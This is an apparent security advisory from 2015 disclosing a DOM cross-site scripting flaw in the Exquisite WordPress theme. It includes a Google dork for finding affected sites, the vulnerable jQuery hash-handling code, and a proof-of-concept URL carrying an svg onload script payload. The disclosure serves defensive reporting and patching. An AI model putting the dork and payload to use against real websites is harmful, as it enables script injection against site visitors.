WordPress Exquisite Ultimate Newspaper 1.3.3 Cross Site Scripting

2015-04-28T00:00:00
ID PACKETSTORM:131657
Type packetstorm
Reporter Osama Mahmood
Modified 2015-04-28T00:00:00

Description

                                        
                                            `# Exploit Title: DOM Cross Site Scripting In Exquisite - Ultimate Newspaper  
WordPressTheme  
# Google Dork: inurl:/wp-content/exquisite-wp/assets/  
# Date: 24/04/2015  
# Exploit Author: Osama Mahmood (M4rkm3n)  
# Vendor Homepage:  
http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019  
# Software Link:  
http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019  
# Tested on: Windows 8/7  
  
Hello friend,  
  
Today i am filling this vulnerability which i found in the WordPress theme  
(Exquisite - Ultimate Newspaper) DOM XSS  
The vulnerability was caused by the issue is at line 83 of  
exquisite-wp/assets/js/jquery.foundation.plugins.js  
  
Vulnerable Code :-  
  
});  
  
if (window.location.hash) {  
activateTab($('a[href="' + window.location.hash +  
'"]').parent('dd'));  
settings.callback();  
}  
  
};  
  
and it was causing DOM XSS.  
  
[-] Proof Of Concept:  
URL:  
http://localhost/x/wordpress/wp-content/exquisite-wp/assets/  
http://localhost/x/wordpress/#<svg/onload=prompt(document.domain)>  
[-] Fix / Solution:  
Update to latest framework.  
[-] Reported:  
Was reported to the Developers on 26/04/2015  
  
My Profile :-  
https://www.facebook.com/th3.m4rkm3n.007  
https://twitter.com/OsamaMahmood007  
https://www.linkedin.com/in/osamamahmood007  
`